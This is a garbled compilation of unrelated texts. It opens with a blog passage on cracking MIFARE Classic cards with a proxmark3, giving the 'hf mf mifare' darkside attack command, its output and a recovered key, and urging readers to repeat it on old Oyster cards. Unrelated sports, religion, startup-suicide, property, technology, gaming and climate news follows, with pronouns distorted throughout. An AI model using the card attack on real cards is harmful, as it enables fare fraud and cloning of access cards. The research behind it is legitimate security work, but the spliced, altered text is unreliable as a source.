-| -- -- -- -- -- -- -- -- | -- -| -- -- -- -- -- -- -- -- | -- -|
I abbreviated the output , otherwise there would be pages of key dumps , showing each recovered sector key . You can see from the summary at the end that all A & B keys are successfully recovered 🙂
The process took less than ten minutes to open the entire contents of the 1K mifare card ( 20+ minutes faster than the tikitag ( ACR-122U ) ) .
What If There Is No Default Key ?
Some older mifare cards ( such as the early London Oyster cards ) suffer from a 3-bit parity leak . Parity bits are encrypted with the same bit of keystream that encrypts the first bit of the next byte of plaintext . During the authentication protocol , if the reader sends wrong parity bits , the card stops communicating . However , if the reader sends correct parity bits , but wrong authentication data , the card responds with an ( encrypted ) error code . This breaks the confidentiality of the cipher , enabling an attacker to establish a side channel .
This second attack exploits the weakness of the parity bits but this time the attacker mounts an adaptive chosen ciphertext attack . The process uses approximately 28500 authentication attempts . We need to make sure that the challenge nonce of the card is constant , which is why this takes approximately upto fifteen minutes . During these authentication attempts , the attacker adaptively chooses the challenge to the card , ultimately obtaining a challenge that guarantees that there are only 436 possibilities for the odd-numbered bits of the internal state of the cipher . This reduces the offline search space to approximately 33 bits . On a standard desktop computer this search takes about one minute .
The proxmark command for this attack is hf mf mifare :
proxmark3 > hf mf mifare -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - Executing command . Expected execution time : 25sec on average : - ) Press the key on the proxmark3 device to abort both proxmark3 and client . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ................. uid ( 216 ? ? ? ? ? ) nt ( b3008ce0 ) par ( 817929311941f1c9 ) ks ( 080e0d0406090f01 ) |diff| { nr } |ks3|ks3^5|parity | + -- -- + -- -- -- -- + -- -+ -- -- -+ -- -- -- -- -- -- -- -+ | 00 |00000000| 8 | d |1,0,0,0,0,0,0,1| | 20 |00000020| e | b |1,0,0,1,1,1,1,0| | 40 |00000040| d | 8 |1,0,0,1,0,1,0,0| | 60 |00000060| 4 | 1 |1,0,0,0,1,1,0,0| | 80 |00000080| 6 | 3 |1,0,0,1,1,0,0,0| | a0 |000000a0| 9 | c |1,0,0,0,0,0,1,0| | c0 |000000c0| f | a |1,0,0,0,1,1,1,1| | e0 |000000e0| 1 | 4 |1,0,0,1,0,0,1,1| 000fb144|005184d3 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Key found : ffb721ee44ea
Now this attack took less than a minute on a Quad-Core MacBook Pro 1.5GHz 🙂
Now , with a Sector Key recovered , we can use the Nested Attack demonstrated above to recover the entire card 🙂
Now to emphasise the speed of this attack ! Using libnfc and the Darkside attack ( mfcuk ) software on the ACR-122U hardware , I spent over 2 weeks attempting to crack the same sector before my machine inadvertently crashed ; I 'm not sure what caused the crash , but after 2-weeks I still had not cracked the key 😦
Note : Now I 'm not going to post the contents of my Oyster card , but if you have a proxmark3 and an older Oyster card , you should be able to repeat and reproduce this attack . Oyster has since moved to the more secure Mifare Desfire Cards ( similar to the RFID chips in UK passports ) , which are not vulnerable to this attack !
References
Nursing a late-game lead over Marshall that topped 20 points more than once , Illinois coach Brad Underwood took a timeout and unloaded on their team .
Coasting toward its fourth straight win , Underwood thought the Illini had lost their focus -- taking questionable shots and playing soft defense .
`` You 've got to learn to finish , you 've got to learn to make free throws and you 've got to learn to go 'til the final horn , '' they said after the game .
`` You do n't want to know what they said ( in the timeout ) — it might make you sad , '' redshirt sophomore forward Kipper Nichols added . `` He had a few choice words for us . ''
Illinois ( 4-0 ) did close out the Thundering Herd , 91-74 , riding 17 points each from Nichols and Leron Black and 11 rebounds from Nichols , who came off the bench .
The Illini held Marshall ( 4-2 ) leading scorer Jon Elmore to 14 points . Elmore entered the game averaging 28.3 a game . They were 2-of-11 shooting on the night , including 0 of 5 in the second half . Elmore also came into the game averaging 7.7 assists but had just three Sunday .
Nichols and Underwood said Illinois focused on the junior guard and it worked , but Marshall coach Dan D'Antoni said Elmore 's lack of production had more to do with them than Illinois .
`` It was all Jon . He 's pressing because they have n't learned to trust the players they have this year , '' said D'Antoni , whose team includes nine freshmen and sophomores . `` That 's a young ball club . ''
One of those freshmen , Jarrod West , led Marshall with 23 points .
Mark Smith and Michael Finke added 13 each for Illinois .
Image caption The Archbishop of Canterbury was making their first presidential address to the Synod
A campaign to stop homophobic bullying will be introduced in Church of England schools , the Archbishop of Canterbury , Justin Welby , has announced .
The Church was not changing its teaching on gay relationships , they said .
But they told the General Synod : `` We must accept that there is a revolution in the area of sexuality . ''
The archbishop recently opposed the gay marriage Bill in the House of Lords , but said the Church should heed some of the views of the Bill 's supporters .
`` There is a revolution . Anyone who listened , as I did , to much of the Same-sex Marriage Bill Second Reading Debate in the House of Lords could not fail to be struck by the overwhelming change of cultural hinterland , '' they said .
`` There was noticeable hostility to the view of the churches . I am not proposing new policy , but what I felt then and feel now is that some of what was said by those supporting the Bill was uncomfortably close to the bone .
`` Pretending that nothing has changed is absurd and impossible , '' the archbishop said in their first presidential address to the synod , meeting at the University of York .
Analysis Justin Welby 's speech was partly exhortation , partly stark warning , to a Church floundering in a society undergoing rapid social and cultural change . They spelt out the Church 's predicament in dealing with sexuality as the clearest example . They cited the debate over gay marriage in the House of Lords and the way their own opposition to the legislation had been `` utterly overwhelmed '' . The implication was that Anglicans must be ready to take risks and reimagine how the Church 's teaching could be applied to a radically different world . In some ways it was a bleak assessment - Anglicans had lost trust in each other , they sometimes faced `` noticeable hostility '' , and lived in a society where fewer people , particularly young people , thought of themselves as Christian . Archbishop Welby was preparing the Church to take the sort of journey it instinctively wants to spread over decades or centuries , in a few years . To ignore the need , they insisted , would be both `` impossible and absurd '' .
`` The majority of the population rightly detests homophobic behaviour or anything that looks like it and sometimes they look at us and see what they do n't like , '' they said .
`` With nearly a million children educated in our schools we not only must demonstrate a profound commitment to stamp out such stereotyping and bullying but we must also take action .
`` We are therefore developing a programme for use in our schools , taking the best advice we can find anywhere , that specifically targets such bullying . ''
New proposals before the Synod meeting could see measures to introduce women bishops be adopted as draft legislation ahead of a possible vote in 2015 .
The archbishop , who took up their post in March , has said they want to see the measure passed as soon as possible .
But traditionalist Anglicans say the proposals offer fewer concessions than legislation they rejected in November .
The vote passed in the Houses of Bishops and Clergy , but failed to gain the required two-thirds majority in the House of Laity .
Archbishop Welby acknowledged that a `` very significant absence of trust '' still exists in the Church of England between supporters and opponents of women bishops .
But they told the synod the decision was not `` more difficult or more complicated than anything faced by the generations before us '' .
They went on : `` One thing I am sure of is that trust is rebuilt and reconciliation happens when whatever we say , we do .
`` For example , if , while doing what we believe is right for the full inclusion of women in the life of the church , we say that all are welcome whatever their views on that , all must be welcome in deed as well as in word . If we do n't mean it , please let us not say it . ''
They added : `` Lack of integrity and transparency poisons any hope of rebuilding trust , and rebuilding trust in the best of circumstances is going to be the work of years and even decades . ''
Honorable Mention
2011 Skyscraper Competition
Khushalani Associates
Rajiv Khushalani , Thomas Kariath , Mihir Sanganee
India
PoroCity is a project that seeks to re-organize extremely high density environments into an integrated three-dimensional city while addressing sustainability problems .
The specific site for this proposal is Dharavi , Mumbai , India ; one of the largest slums in the world and one of the most contentious sites of the new millennium .
It is poised for being the one of the largest regeneration schemes of recent times and has attracted investments from some the world 's biggest real estate companies and leading global architecture and planning firms . Spread over 216 hectares , the site is triangular in plan , and has a residential population of 376,000 people . In addition to the residential population , the district has an estimated 5000 businesses and 1500 single room industries . A large number of these businesses are hybrid homes , where residents live and work in the same area . There is also a lack of public amenities , including schools , hospitals , and parks .
PoroCity is an urban proposal which addresses the physical and economic concerns of the area while preserving the hybrid homes and the strong communal bonds . It is derived from a progressive subdivision of a right-angled Sierpenski 's Pyramid , giving a range of volumes and voids to incorporate a variety of programs .
The smallest self divisible unit of the Sierpenski 's Pyramid is pixilated into 3m x 9m blocks , divided into collective housing units with north facing terraces . This is done to avoid the harsh tropical sunlight , allowing the terraces to be used during daytime . Larger interstitial volumes may be used as community spaces . As the scale of the blocks increases these are used for small scale infrastructure , such as clinics and supermarkets , while larger units are conceived as educational institutions , factories , and offices .
PoroCity is a car-free environment where means of vertical , horizontal and diagonal access is through elevators , moving walks , escalators , and funiculars . The open ended nature of the system allows for different volumes to be plugged-in and accommodate for growth and change in density .
“ It was n't just about building a business . It was about building a lifestyle that was about delivering happiness to everyone , including ourselves. ” — Tony Hsieh , “ Delivering Happiness ”
Before Tony Hsieh stepped down from their leadership of the Downtown Project — their radical experiment in building a startup city in Downtown Las Vegas — there were already signs of serious trouble . Startups were shutting down . Outside investment was n't coming . And then there were suicides .
Three of the most prominent entrepreneurs involved with Hsieh 's project committed suicide , sending the tight-knit community into a tailspin .
In January 2013 , Jody Sherman , the 48-year-old founder of Ecomom , one of the most prominent Vegas tech-funded startups , shot themselves while in their car . Their company had been going south .
In January 2014 , 24-year-old Ovik Banerjee , who was part of the first Venture for America group in Vegas and an integral member of the Downtown Project team , leapt from their Town Terrace apartment in downtown .
In May 2014 , Matt Berman , the 50-year-old founder of Bolt Barber , the flagship shop at the center of the Container Park , was found in their home in an apparent suicide by hanging , though it 's still unclear . People familiar with the Downtown Project say many of its small businesses have been struggling .
Amid all the experimentation and twee playfulness of the Downtown Project , the deaths were a jarring moment of flesh-and-bone reality in a community of about 300 entrepreneurs .
And yesterday , a substantial round of layoffs was announced .
Hsieh seemed to work hard to keep each suicide quiet . Entrepreneurs told me there were few community resources made available , no large-scale gatherings , no cathartic outpouring , and that they felt confused about what was happening and why it was never addressed . Many in the Downtown Project , including a crisis counselor who worked with the parents of one entrepreneur , pointed to Hsieh 's philosophy — their obsession with happiness , and with imposing it upon the community — as one of the problems .
“ Suicides happen anywhere . Look at the stats , ” Hsieh said , sounding agitated , when I asked them about it one evening on folding chairs in the Learning Village , where speakers regularly come to lead sessions . “ It 's harder for people who are really good students in school . Then they move in to this , where there is no instruction manual , and you have to be MacGyver on your own . ”
My question appeared to make them uncomfortable . They scooted two seats away .
Whether or not the suicides are statistically significant , the deaths have clearly shaken the entrepreneurs . Many points directly to Hsieh , the enigmatic leader who guided hundreds into their experiment in the desert .
“ Startups are a major stressor , and it can be a trigger for dormant stuff that 's already there , ” said Kimberly Knoll , a therapist who works with Downtown entrepreneurs . “ The difference here is the focus on happiness — that 's a goal . But if we negate the negative emotions in our lives , it takes us away from happiness and brings around shame . The whole idea of Downtown is grand and wonderful and purposeful , but sometimes the way we 're going about it is n't psychologically healthy . ”
Where does this emphasis on happiness come from ?
“ In Vegas , it comes from top down . It comes from Tony , from Zappos , ” Knoll said . “ The book is called ‘ Delivering Happiness . ' ”
Hsieh 's 2010 book is their memoir and manifesto . It follows them as they start companies , beginning with a worm farm as a child , through to the sales of LinkExchange and then Zappos . In it , they realize that their mission is not to make money , but to make people happy and build better lifestyles for them .
Knoll had been a crisis counselor after one of the suicides . When Banerjee 's parents arrived from Alabama , their son had been dead for a few days ( police had misidentified the body ) , and counselors spoke with the parents before they could see their body .
“ The pressures are the lack of being able to confide with people , having to put on a vest or mask , and having to say everything 's great , ” Knoll said . “ The struggle of how do you keep your team going , and knowing that you 've only got one month left on your runway . ”
Hsieh — a difficult leader who rarely went to the office but seemed to be everywhere — created an environment that was confusing for some of their followers .
Banerjee had been hired by Hsieh without being given a specific job . They worked at first for Hsieh 's cousin Connie Yeh at the 9th Bridge School ( which focuses on entrepreneurship and starts at age 6 weeks ) . They were moved to the Downtown construction zone and the Learning Village , where their friends told me they were asked to mislead city officials about the nature of the project , skirting zoning codes and the permit process by claiming a permanent structure was temporary . Doing this upset them deeply , a source told me .
Hsieh 's real estate partner , Andrew Donner at RGG , said there was nothing misleading , and said the plan had simply changed : “ The entitlement on the Learning Village was initially a temporary permit for construction trailers . As the vision for the Learning Village continued to expand and materialize , the entitlement was changed to incorporate something more appropriate for how it is currently being used . ”
Banerjee struggled . “ He was really principled , and it tore them up , ” one source said . “ He never had a clear job . No one had a clear job . It was Tony leading people saying , ‘ Come out and do things , come out and have fun , ' and then you get here , and there 's no structure , and that 's what they did to Ovik . ”
Before their death , Banerjee emailed Hsieh and said they were concerned about the Downtown Project — concerned about how resources were being allocated , and about how people in the company were treated . They listed problems that they were seeing Downtown , starting with values : “ Problem 1 ) Lack of Culture , Mission , and Core Values , ” according to parts of the email correspondence , which Hsieh shared with me .
Hsieh had responded to each concern , noting that it takes time , and that Banerjee should work with their manager . A friend of Banerjee 's said they had felt these emails were “ dismissive . ”
After they died , four employees at the Downtown Project quit .
Las Vegas has always had a high suicide rate — the odds of suicide among Vegas residents have been reported to be about 50 percent greater than in other large U.S. metropolitan areas between 1979 and 2004 .
Add to this a peculiar pressure in Las Vegas : It is very important you be perceived as happy in Las Vegas . It is very important for entrepreneurs to hit the bars to maximize their “ collisionable hours . ”
As a response to the deaths , Downtown Project denizens are thinking of setting up a dedicated crisis hotline . Two entrepreneurs are even planning to start churches .
“ After Ovik [ Banerjee ] , they brought me in to do crisis counseling . From what I hear , there has n't been much more , ” Knoll said . “ Like anything else in our world , we 're hyped up on something , and then it goes away . ”
When I met with Las Vegas Mayor Carolyn Goodman , they also brought up Hsieh 's emphasis on happiness as something that perplexed her : “ He 's big on fun . He 's big on collisions , ” they said , referring to Hsieh , the magnetic center of this tech renaissance . “ And there 's one thing I 'm missing there — happiness . ”
Goodman turned to Lora Kalkman , their assistant . “ I could n't turn to Lora and say , ‘ Lora , you 've been sad for a week . ' I ca n't make Lora happy — you have to earn , you have to achieve . You ca n't make happy . ”
Mark Rowland is a career coach who helps on the Delivering Happiness team as the “ Happy Cheer Leader. ” On their bio page , it says : “ Mark 's passion in life is to be happy. ” They see their role as inspired by and informed by the suicides , and said Hsieh hired them as part of a suicide response .
“ There was n't an independent person that these guys could go to , ” they said . “ There 's a lot of people who have flown into Vegas from another part of the country . They 've left their family , their friends , their network . The people they would normally hang out with when they 're having a bad day are n't around . ”
Jonathan Jenkins , the affable Southern co-founder of supply chain startup OrderWithMe , said that by the third suicide , they realized they needed to start a church .
“ A lot of the young people who do these startups , they do n't think they can be frank with each other , ” Jenkins said . “ Just before this meeting with you , I met with someone who said , ‘ You know , I 'm out of runway . Like even for food to eat . ' And who do they turn to ? ”
They compared it to the concept of “ face ” in China — essentially , preserving one 's reputation — and pointed out that often the only people an entrepreneur knows in Vegas are venture capitalists and other struggling founders .
“ We call it ‘ face ‘ in China — everything 's great , we 're doing great , ” said Jenkins , who founded their company in China . “ But at the end of the day , you need a community , a safety net . You do n't want to air out these issues to your investors , but if there are only investors around , then what do you do ? ”
One entrepreneur I spoke with who requested anonymity for fear of being ostracized by the community said they felt the problem was that there were n't more cathartic community events after the suicides . And this week 's layoffs were sprung on the team so suddenly .
“ It 's been kept very , very quiet , ” they said . “ They need to open the doors . You ca n't hide it . You ca n't pretend it did n't happen — everybody knows these people . There is a danger of happiness as a goal , it 's a byproduct of striving for that which you desire . Where 's the grownup ? Barry from Venture for America is 22 years old . There was no check-in , no meetup for the community . I want someone who can talk to me about my life , not my business . ”
“ We have a lot of young people who may be business-brilliant , but the pressure is insane . It 's lonely . There 's a pressure to socialize and go out . There 's a pressure to party . ”
As a response to the suicides , the Downtown Project 's clinic , Turntable Health , which is also a co-working space , is going to hire a full-time psychiatrist .
When I arrived at the clinic for an interview , a girl working at a standing desk told me that she 'd shoot the founder a text to let them know I 'd arrived . Dr. Zubin Damania had gained prominence through their quirky medical-rap YouTube videos , such as “ Manhood in the Mirror , ” and knew Hsieh from Harvard . We talked while they watered some little plantings — peppermint and lemon thyme — in the clinic 's demonstration kitchen .
The clinic offers primary care , and costs $ 80 a month . You need insurance beyond that . They said Vegas already has a high suicide rate ( about twice the national average ; 34.5 per 100,000 people ) , but that being in an entrepreneurial city within the city exacerbates it .
“ In an entrepreneurial community , so , so many boundaries are gone , ” Damania said . “ People are taken away from their social moorings . It 's extremely high-pressure . ”
Damania said there 's a tendency to say the suicides were just a fluke or a coincidence , but that they 're actually a fundamental problem with entrepreneurship .
“ It 's a symptom of this performance , ” they said .
It 's part of an ultra-individualistic , stoic ethos similar to one espoused by philosopher Ayn Rand .
“ Founders are the worst , ” they said . “ There 's a Randian — I must be the John Galt — feeling . You can be as liberated as you want , but there 's a web of connectivity , and they forget . ”
MacGyvers on their own , as Hsieh put it . Building a startup city in the desert is lonely and hard . Founders leave behind their social networks and their roots , and engage in an incredibly risky activity — starting a company . They often move to Las Vegas because they received venture capital from the Vegas Tech Fund , so their closest friends may be venture capitalists . And when companies begin to fail , there is little emotional support for the entrepreneurs .
As one entrepreneur who was laid off from the Downtown Project yesterday told me : “ There 's not that much hope here now . ”
Correction : ( 10/1/2014 ) In an earlier version of this story , Dr. Zubin Damania 's name was misspelled . The timing of Jody Sherman 's death has also been corrected .
( 10/3/2014 ) Turntable Health had planned to hire a full-time psychiatrist , not a therapist as we first reported .
Selling the Australian property dream to the Chinese investor market
Updated
In a glitzy private dining room in central Shanghai , Lulu Pallier is meeting a group of investors for lunch .
Them guests are members of the rising Chinese middle class and on the menu is Australian property .
`` I hope everyone enjoys the dinner today . To our old friends and our new friends , welcome . Feel free to ask me any questions about purchasing property in Australia , '' they say to the group .
China has come a long way from the egalitarian ideals which founded the modern nation .
Among the small group , women sip champagne wearing cocktail dresses while the men peruse their laptops dressed in sharp designer suits .
Ms Pallier themselves arrives in a polished black Bentley , all part of a slick sales pitch to sell the dream of owning an Australian house or apartment .
`` The winter in Shanghai is very cold and summer is too hot . The seasons in Australia are just opposite to China so it would be nice if they live in Australia during those seasons , '' they say .
Sitting amongst the group is finance worker Iris Huang , who is signing a contract for a property they have only ever seen online .
`` I have n't seen it , but I 've been living Australia , I am familiar with that area so I do n't need to see , '' Ms Huang says .
`` Most of the investment , if they trust somebody like Lulu the real estate agent , I do n't think they need to see , just sign and email — it 's very convenient . ''
Government-backed corporations also buying up
Australian property is big business in China . With a stable economy , clean air and good schools , Australia can be an easy sell for specialist real estate agents like Ms Pallier .
And more recently some of China 's richest government-backed corporations are also cashing in investing unprecedented amounts in Australian real estate .
Nerida Conisbee leads the research team at international realtors Colliers . They have watched as a flood of Chinese money has entered the real estate market over the past five years .
`` China now dominates in terms of investment into real estate , '' they said .
`` They 're paying more than what will stack up for local developers is our understanding , I think it just comes down to their investment metrics and perhaps the comparison of returns elsewhere . ''
Official figures also tell the same story . In 2010 China was Australia 's second biggest investor in real estate after the US , committing $ 2.3 billion to domestic projects .
Five years on and today China dominates . As much as $ 12.4 billion was poured into the property sector , more than double the amount it invested in mining .
Fears for Australian buyers could be unfounded
The tsunami of Chinese money stoked fears that Australian buyers were being priced out of the market .
There were ugly scenes at least one property auction in August as protesters clutched placards claiming `` Foreign Ownership is Economic Genocide '' .
But Chinese investment could be having the opposite effect .
Australian law forces foreign nationals into buy new-builds . The vast majority of money is creating new housing stock , which could dampen rising property prices .
`` Melbourne has added around a thousand apartments per annum since 1990 ... we 're seeing 20,000 apartments expected to be delivered over a five-year time period , so I guess the question is who will occupy them ? '' Ms Conisbee says .
My fear is that the apartments may be overpriced for the local market and will be sold overseas . Michael Bentley , Citylife International
`` Historically we 've never seen this happen before , we have n't seen it happen in any other capital city in Australia .
`` I do think it will be good for affordability in that city and we are seeing a stabilisation of rental rates in many cities as a result of development and in terms of affordability for occupiers — it would be a positive . ''
But views differ on how Chinese investment will affect the market .
Michael Bentley , the managing director of Hong Kong realty Citylife International , believes apartments being built in Sydney and Melbourne are designed and priced exclusively for cashed-up Chinese buyers willing to pay over the odds .
`` My fear is that the apartments may be overpriced for the local market and will be sold overseas , '' they said .
`` Mainland developers are pretty cash rich and they can outbid most Australians on real estate development sites and my fear is that they could design apartments that will appeal to mainland buyers and may not be particularly liveable for Australian buyers . ''
Ms Pallier 's clients are not only prepared to pay Sydney prices , they think they are cheap .
`` Compared to Shanghai property , Sydney property is not that expensive , '' Ms Huang says .
For Ms Pallier , the appetite for Chinese investment is not about to dry up anytime soon .
`` They come to this country , they want to buy something special , the priority is view so waterfront , a nice house and preferably a boat marina . It 's something money can not buy in China , '' they say .
Topics : housing-industry , business-economics-and-finance , china , australia
First posted
Story highlights Clinton is given an award at an LGBT dinner
They call for supporters to focus on the 2018 midterm elections
Washington ( CNN ) Hillary Clinton on Thursday warned that President Donald Trump could roll back progress on LGBT rights .
`` We may not ever be able to count on this administration to lead on LGBT issues , '' Clinton said in a speech in New York .
Clinton was addressing a fundraising dinner for The Center , an LGBT community organization , where they received an award and thanked members of the audience for supporting their unsuccessful 2016 presidential bid . But they told those gathered there to watch out for `` the progress that we fought for , that many of you were on the front lines for . ''
`` It may not be as secure as we once expected , '' they said .
The event was yet another public foray for Clinton , who in the weeks and months immediately after their electoral upset , generally did not comment on politics . More recently , however , they have used speaking events to lay into Trump and the Republican Party .
Read More
WHEN it comes to wind turbines , every bit of extra power counts . Replacing the machines entirely can be a costly business , however .
So Siemens has unveiled three designs for enhancing the aerodynamics of turbine blades . The first , DinoTails , resembles the backplates of a stegosaur and increases the area of a blade , adding lift and so power . It also makes them quieter . When air flows from above and below the trailing edge of a turbine blade meet , they create turbulence , which can increase drag and make it noisy . The DinoTails ' serrated edge breaks up that flow , reducing the turbulence .
A snow-shovel-shaped device called DinoShells extends the blade shape down to where it joins the main shaft , making the turbine more efficient . The third attachment is called a vortex generator , featuring small fins that force the air to stay in contact with the top of the blade for longer , increasing lift . Siemens says combining the three could increase the energy output of an older turbine by up to 1.5 per cent . That may not sound like a lot , but the Altamont Pass Wind Farm in California – one of the world 's biggest – produces 125 megawatts on average . A 1.5 per cent increase there would meet the energy needs of an extra 2500 households .
The Altamont Pass Wind Farm could meet the energy needs of an extra 2500 households
Paul Veers , chief engineer at the US National Wind Technology Center says that such a small increase in power is often enough for energy firms . “ If you can add one to two per cent to a big number , then it makes a difference , ” they say . Siemens is installing the attachments to give a 3.15 megawatt boost to the Bison 2 and 3 Wind Energy Centers in North Dakota . Construction is due to be finished by the end of the year .
Do Consumers Really Care About Wow ?
Reading Time : 2 minutes
I am fascinated by the amount of media and bloggers who said that what Apple introduced in the iPhone was incremental and did not have the “ wow ” factor ” . They complained because they wanted support for NFC ( not even close to being ready for prime time ) and dissed it for its new connector , as if it would cause great harm to their lives .
Grow up people ! From 30+ years of following Apple I have learned that when Apple designs a product , everything they do is related to how “ they ” want to use the products themselves . Every edge designed into the product and every component is done for a reason . They do n't listen to the media or rumor sites that say they want this or that feature . Instead , they create products they would love to use .
I remember talking to Steve Jobs about this on a couple of occasions and they made it clear to me that Apple is about creating great products and writing world class software and the motivation was always based on how they and the team would like the product and how they would use it . They do n't do focus groups . They do n't do consumer research and instead , they create products they would love and believe that in the end , consumers will love them too . Never once did they say to me “ Apple is shooting for the wow factor . ”
They also have to live with the laws of physics . Although I believe the iPhone is the most elegantly designed to date , everything they did to enhance it , whether it is to the case itself and all components inside , literally pushed the law of physics to the edge of what can be done . At the same time , they made sure it was recognizable as an iPhone . Keep in mind , Apple has spent the last 6 years branding its look and feel and to create a new design that maybe looked like a banana , wallet or any other form factor did not make sense .
Thankfully , consumers see past the drivel that comes from some media and bloggers who write about what “ they ” wanted Apple to do or why “ they ” are disappointed in Apple . In fact , Apple seems to get this right every time they introduce the new iPhone .
The major reason for this is that Apple does not develop products for the media and bloggers . That is a good thing . If they did , iPhones would have 30 i/o ports and look like a can of spray paint . And they seem to hit the right nerves with each new model .
While media and bloggers are complaining about the lack of wow , consumers who seem smarter then many of these writers , just go out and buy Apple products in huge numbers . Apple is the most profitable company in America and they did not get this way from listening to the media and bloggers .
But they did get to be this profitable by adhering to their core beliefs that is ingrained into the Apple DNA . They create products they themselves would like to buy and use and believe that consumers will buy them too .
＞＞ a-cho.com ＞＞ 大会結果 ＞＞2017年の大会結果 ◆ウルトラストリートファイター4 大阪vs東京 対抗戦 （2017年8月12日開催）
対抗戦PV 対抗戦
【ノーカット版】 対抗戦
【試合のみ版】
出場選手一覧 （一部プレイヤーネームの表記がPVとは異なるものがあります）
※8/11 メンバーの変更あり
◆大阪チーム（20名）
◆関東チーム（18名）
◆結果
1Ｐ：大阪 結果 2Ｐ：関東 YAMANEKO ( ON ) ×- ○ フハジン ( TH ) ブラジリアン ( BI ) ×- ○ ふるん ( SK ) ×- ○ ひこにゃん ( KE ) ○ -× ×- ○ クロブチ ( IB ) TERAMAE ( YA ) ○ -× ○ -× 鴨塩 ( HU ) ×- ○ まのび ( RS ) 牛鬼 ( BI ) ○ -× ○ -× あったま太郎 ( SK ) ○ -× トミーロッド様 ( BA ) ×- ○ mogeta ( RL ) ドギーマン ( SE ) ○ -× ×- ○ シモさん ( YA ) ふりくり ( RU ) ×- ○ りゅうじ ( GK ) ○ -× ×- ○ ラガマフィン ( DE ) えにくす ( IB ) ×- ○ たけまる ( GE ) ○ -× ×- ○ トントン ( CO ) マスコット ( AB ) ○ -× ×- ○ あったま太郎 ( SK ) サ号 ( RS ) ○ -× ○ -× しんと〜 ( BL ) ×- ○ 北千住DJ ( DJ ) 50円 ( EL ) ○ -× ○ -× キサラン ( RY ) ×- ○ うとさん ( RS ) ボブおじさん ( DU ) ×- ○ うりょ ( CH ) ○ -× ○ -× マッスルキングダム ( EH ) ○ -× YOUTH-K ( PO ) ×- ○ KARU ( CA ) 6 ( PO ) ×- ○ サボハニ（VI） ×- ○ カントナ ( ZA ) ○ -× ○ -× バビ江（EL） ×- ○ けんぞー ( GO ) wao ( ON ) ○ -× 勝ち 結果 負け
◆キャラ表記一覧
AB アベル DJ ディージェイ GY ガイ SE セス AD アドン DU ダッドリー HK ハカン SG サガット BA バルログ EH E・本田 IB いぶき SK さくら BI バイソン EL エル・フォルテ JU ジュリ TH T・ホーク BL ブランカ EV 殺意リュウ KE ケン VE ベガ CA キャミィ FE フェイロン MA まこと VI C・ヴァイパー CH 春麗 GE 元 ON 狂オシキ鬼 YA ヤン DA ダン GK 豪拳 RS ローズ YU ユン DE ディカープリ GL ガイル RU ルーファス ZA ザンギエフ DH ダルシム GO 豪鬼 RY リュウ
ツイート
＞＞ a-cho.com ＞＞ 大会結果 ＞＞2017年の大会結果 （2017年8月12日開催）（一部プレイヤーネームの表記がPVとは異なるものがあります）※8/11 メンバーの変更あり◆キャラ表記一覧
AUSTRALIAN cities are 5C hotter compared to surrounding areas because of a phenomenon known as the ‘ Urban Island Heat ' effect that could eventually turn them into death traps .
Densely populated urban areas including Sydney , Melbourne and Brisbane are baring the brunt of the UHI across the country and not even a looming winter can stop it .
The UHI occurs when natural permeable surfaces including grass , plants or bush land are replaced with concrete , asphalt and infrastructure .
According to the Centre for Science Education ( UCAR ) , urban development causes surfaces that were once permeable and moist to become impermeable and dry . They heat up during the day and retain the warmth but infrastructure prevents it from escaping into the cold night .
These changes cause urban regions to become warmer than their rural surroundings , forming an “ island ” of higher temperatures in the area .
“ These surfaces absorb — rather than reflect — the sun 's heat , causing surface temperatures and overall ambient temperatures to rise , ” according to a statement from UCAR .
“ Displacing trees and vegetation minimised the natural cooling effects of shading and evaporation of water from soil and leaves .
“ Tall buildings and narrow streets can heat air trapped between them and reduce air flow . Waste heat from vehicles , factories , and air conditioners may add warmth to their surroundings , further exacerbating the heat island effect . ”
The UHI is perpetuated by residents in urban areas who suffer from the effects and increase usage of electric fans and airconditioners for relief . The increased energy demands strain resources which often leads to ‘ rolling blackouts ' or power outages and contributed to an even hotter UHI .
But that 's not the only significant impact of the phenomenon .
According to UNSW researchers , extreme city heat could cause train lines to crumble and could cause heat stress , damaging our organs .
“ Since 1900 , extreme heat events have killed more Australians than bushfires , cyclones , earthquakes , floods and severe storms combined , ” the researchers said .
WHAT 'S BEING DONE ABOUT IT ?
Watering pavement before a heatwave could also be the answer to bringing down the temperature in urban heat islands . It 's popular in Japan and is being considered in Paris , but some researchers believe it could cause extra humidity and heat stress .
Several experts have recommended changing the colour of roof tiles as another way to reduce urban heat . Dark tiles absorb more heat than lighter colours .
The Cool Streets initiative was developed by landscape architect Dr Libby Gallagher , whose PhD found changes to street design could reduce CO2 emissions , cool neighbourhoods and reduce power bills for residents .
Dr Brent Jacobs , research director at the Institute of Sustainable Futures at UTS , said temperatures were rising faster in western Sydney than in the east due to climate change and urban development . Eco-friendly developments with a focus on green space in Sydney suburbs including Waterloo and Green Square are being put in place in a bid to cool the areas down .
In 2014 , Melbourne City Council found temperature variations of up to 4C degrees between the city centre and suburbs because of the UHI .
Melbourne City Council loses about 1500 trees a year through old age , heat stress , development and vandalism . It replaces them with 3000 new trees annually as part of an urban-forest strategy .
In Brisbane , suburbs including Windsor , Wilston and Milton , will be hotter by 2023 if the city concentrates on an infill development plan , according to new research by Queensland University of Technology .
But the findings published in the Land Use Policy journal showed that if a sprawl development instead occurred , inner-city suburbs including Fortitude Valley could be significantly cooler in 2023 , compared to 2004 .
Dr Liton Kamruzzaman , from the Science and Engineering Faculty , said the findings found the number of suburbs suffering from extreme UHI effect was increasing .
“ [ It has increased ] from 10 per cent in 1991 to 20 per cent in 2013 , and this trend will continue if effective planning policies are not introduced , ” they told the Brisbane Times .
Last year the then acting Minister for Cities Greg Hunt announced a plan to create cool and green cities and pledged to plant more trees each decade up until 2050 and would look at building greenery on to rooftops .
Globally , 2016 was the hottest year yet and it continues to get warmer .
The hottest year on record was 2015 before it was overtaken last year , and this year could end up being even hotter than the last .
Many other places around the world are affected by the UHI .
Downtown New York City is an urban heat island , a built-up area with temperatures that are higher than the rural areas surrounding it .
According to the Environmental Protection Agency , the annual air temperature of a city with one million people can be 1—3C warmer than its surroundings .
The Heat Island Group has previously reported that the UHI around Los Angeles , California in the US costs the city $ US100 million a year in energy .
